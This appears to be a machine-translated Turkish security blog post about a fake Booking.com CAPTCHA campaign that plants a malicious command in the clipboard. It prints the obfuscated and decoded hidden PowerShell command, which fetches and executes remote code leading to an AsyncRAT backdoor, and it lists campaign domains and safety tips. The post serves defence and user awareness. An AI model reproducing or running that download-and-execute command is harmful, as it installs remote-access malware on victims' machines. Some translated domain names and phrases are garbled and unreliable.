Siber suçlular, oyun sitelerine ve sosyal medyaya ve sponsorlu reklamlar olarak yerleştirilen bağlantıları yeniden yönlendirme kampanyası başlattı ve bu da sahte web sitelerinin Booking.com olarak poz vermesine yol açtı. MalwareBebytes Research’e göre, insanların% 40’ı genel bir çevrimiçi arama ile seyahat ediyor ve dolandırıcılar için birçok fırsat yaratıyor.
Kampanyanın ilk işaretleri Mayıs ortasında ortaya çıktı ve son yönlendirme hedefi iki ila üç günde bir değişti.
Bağlantıları takiben, ziyaretçileri sahte captcha web sitelerinin panonuzu kaçırdığı tanıdık bir stratejiye getirir ve ziyaretçileri kendi cihazlarını enfekte etmeye çalıştırmaya çalışır.
Bu web sitelerinde her zamanki gibi, sahte captcha istemine bir onay işareti koyarak, web sitesine panonuza bir şey kopyalama izni veriyorsunuz.
Daha sonra, dahil olan dolandırıcılar ziyaretçinin bilgisayarlarında bir çalışma komutu yürütmesini sağlayacaktır. Bu tür bir bilgi asla meşru captcha formlarında kullanılmaz ve tüm bireyler için hemen şüpheli olmalıdır.
Chrome kullanıyorsanız, bu uyarıyı görebilirsiniz:
Uyarı güzel, ama bence bu uyarının ne için olduğu çok açık değil.
Malwarebytes’in tarayıcı koruması kullanıcıları bu uyarıyı görecek:
“Hey, sadece bir şey kopyaladın mı?
Başlıyor, panonuz bu web sitesinden erişildi. İstediğiniz bir yerden geçmeden önce sahibine güvendiğinizden emin olun. Patronunuza bir terminal veya e -posta gibi. ”
Her iki durumda da, sadece bu uyarıları atmayın. Gerçek bir rezervasyon web sitesine baktığınızı düşünseniz bile, bu izlemeniz gereken talimatlar değildir.
Web sitesinin panoya koyduğu şey, daha deneyimli kullanıcılar tehlikeyi görecek olsa da, bazılarına gobbleegook gibi görünebilir.
pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"
Siber suçlular, gerçek niyetlerini gizlemek için karışık gövde, alıntı kesintisi ve değişken adı manipülasyonu kullandılar, ancak aslında söyledikleri (ve talimatları takip ederseniz):
powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"
Kötü niyetli Captcha formu, kullanıcıya pano içeriğini Windows Run iletişim kutusuna kopyalamasını ve yukarıdaki komuttan talimatları yürütmesini söyler. Tarayıcı koruması, panoya kopyalanan metnin bu tür potansiyel olarak kötü niyetli komut içerdiğini tespit ettiğinde, ifadeyi ekleyecektir. 
Kopyalanan içeriğin önünde, onu geçersiz bir komut yapan ve kullanıcı kendilerini enfekte etmek yerine bir uyarı görecektir.
Bir kullanıcı bunun için herhangi bir koruma etkin olmadan düşerse, komut, CKJG.EXE adlı bir dosyayı indirmek ve yürütmek için gizli bir PowerShell penceresi açar ve bu da MalwareBytes/Tehdit tarafından Backdoor.asyncrat olarak algılanan Stub.exe adlı bir dosyayı indirir ve yürütür.
Backdoor.Asyncrat, diğer bilgisayarları uzaktan izlemek ve kontrol etmek için tasarlanmış bir uzaktan erişim aracı (sıçan) olarak hizmet veren bir arka kapı truva atıdır. Başka bir deyişle, cihazınızı sıçanı kontrol eden kişinin merhametine koyar.
Suçlular, finansal zararlara ve hatta kimlik hırsızlığına yol açabilecek enfekte cihazlardan hassas ve finansal bilgiler toplayabilirler.
IOC
Bu kampanya ile ilişkili bulduğumuz alanlar ve alt alanlar hızlı bir şekilde döner. İzleyebildiğim kadarıyla, URL’yi her iki ila üç günde bir açılış sayfasına değiştiriyorlar. Ama işte yakın zamanda aktif olanların bir listesi.
(Rezervasyon.) Suçlama[.]com
(Rezervasyon.) BadGustrewivers.com[.]com
(Rezervasyon.) Mülk ödemeleri[.]com
(Rezervasyon.) Rewiewqproperty[.]com
(Rezervasyon.) Extranet listesi[.]com
(Rezervasyon.) Konuklar[.]com
(Rezervasyon.) Gustescharge[.]com
Kvhandel Kayıt[.]com
pateer-moreinfo[.]com
Guestalerthelp[.]com
Rewiewwselect[.]com
Hekpahar[.]com
bknnnet[.]com
Partnervrft[.]com
Nasıl Güvenli Kalınır
Kendinizi düşme kurbanından bu ve benzer yöntemlere karşı korumak için yapabileceğiniz birkaç şey var:
- Ziyaret ettiğiniz bir web sitesi tarafından sağlanan talimatları düşünmeden izlemeyin.
- Kötü amaçlı web sitelerini ve komut dosyalarını engelleyen etkin bir kötü amaçlı yazılım önleme çözümü kullanın.
- Kötü niyetli alanları ve dolandırıcılığı engelleyen bir tarayıcı uzantısı kullanın.
- Bilinmeyen web sitelerini ziyaret etmeden önce tarayıcınızdaki JavaScript’i devre dışı bırakın.
Pano erişimi bir JavaScript işlevi belgesi ile tetiklenir. JavaScript’i devre dışı bırakmak bunun olmasını engelleyecektir, ancak düzenli olarak ziyaret ettiğiniz birçok web sitesini kırması dezavantajına sahiptir. Yaptığım şey farklı amaçlar için farklı tarayıcılar kullanmak.
Sadece tehditler hakkında rapor vermiyoruz, tüm dijital kimliğinizi korumaya yardımcı oluyoruz
Siber güvenlik riskleri asla bir başlığın ötesine yayılmamalıdır. Kimlik korumasını kullanarak kişisel bilgilerinizi ve ailenizin kişisel bilgilerini koruyun.